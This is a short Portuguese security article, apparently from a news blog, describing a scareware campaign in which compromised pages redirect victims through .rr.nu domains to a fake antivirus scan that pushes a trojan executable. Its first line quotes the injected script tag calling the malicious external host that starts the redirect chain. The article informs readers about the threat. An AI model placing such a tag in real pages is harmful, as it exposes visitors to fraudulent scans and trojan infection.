<script src="http://ionis901andsi.rr.nu/mm.php?d=1"></script>
Após um redirecionamento em uma cadeia de três níveis, as vítimas chegam até um site falso de AV. Neste exemplo, a primeira corrente é o ".rr.nu", e o local de "pouso" é o domínio de nível superior "De.lv". Porém, o local de "pouso" está sempre mudando. Além disso, o site AV malicioso, aparece para executar uma varredura no computador e assustar o usuário, exibindo falsas detecções de malware e trojans. A página parece uma janela do Windows Explorer. O processo de scanning falso se parece com um aplicativo do Windows normal. No entanto, é apenas uma janela pop-up no navegador. O falso antivírus em seguida, solicita que os visitantes baixem e executem sua "ferramenta antivírus" para remover os trojans supostamente encontrados, mas o grande problema nesse cenário, é que o executável, é o próprio Trojan.
Saiba Mais:
[1] Help Net Security http://www.net-security.org/article.php?id=1684